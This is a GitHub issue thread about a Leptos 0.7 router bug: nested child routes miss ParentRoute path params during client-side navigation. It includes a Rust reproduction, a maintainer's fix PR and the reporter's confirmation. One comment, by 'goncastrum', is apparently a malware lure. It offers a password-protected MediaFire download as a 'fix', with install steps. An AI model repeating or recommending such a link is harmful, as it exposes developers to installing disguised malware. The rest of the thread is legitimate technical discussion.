### ISSUE TITLE
[0.7] Nested Route views don't get params from ParentRoute path when client-side routing

### ISSUE THREAD

**Issue by BakerNet** [leptos-rs/leptos#2904]
**Describe the bug**

When Client-side routing to a nested route where a path param is in the `ParentRoute`, the child `Route` cannot see that param.  This notably is NOT the case when hydrating from the same route server side.  The client sees the path param on hydration (verified via `Effect` logging).

**Leptos Dependencies**

0.7-beta

leptos_router for routing
leptos_axum for SSR & Hydration

**To Reproduce**

```
#[component]
pub fn App() -> impl IntoView {
    view! {
        <Router >
            <Routes fallback=|| ()>
                <Route path=path!("/") view=move || view!{<a href="/path/hello">"anchor to /path/hello"</a>} />
                <ParentRoute path=path!("/path/:id") view=move || {
                    let params = use_params_map();
                    let id = params.get().get("id");
                    view!{<div>"Outer: "{id}</div><Outlet />}
                }>
                    <Route path=path!("/") view=move || {
                        let params = use_params_map();
                        let id = params.get().get("id");
                        view!{<div>"Inner: "{id}</div>}
                } />
                </ParentRoute>
            </Routes>
        </Router>
    }
}
```

If you navigate to `/path/hello` both `Outer` and `Inner` will display "hello"
But if you use the anchor from `/` to navigate to `/path/hello`, `Outer` will display "hello" and `Inner` will not.

**Expected behavior**

When navigating to a nested route on the client side, child `Routes` can access params from their respective `ParentRoute` path.

**Screenshots**

https://github.com/user-attachments/assets/b9ff9248-a0e4-4f0f-b1f2-da21d79d7d46

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by gbj** [comment]
Could you test your (presumably real) example against #2906? I think it was a relatively simple fix but it's also possible to break other things, in something as complex as the router :-)

**Comment by BakerNet** [comment]
> Could you test your (presumably real) example against #2906? I think it was a relatively simple fix but it's also possible to break other things, in something as complex as the router :-)

Tested on my project as fixing the issue.  I didn't notice anything broken in my testing.
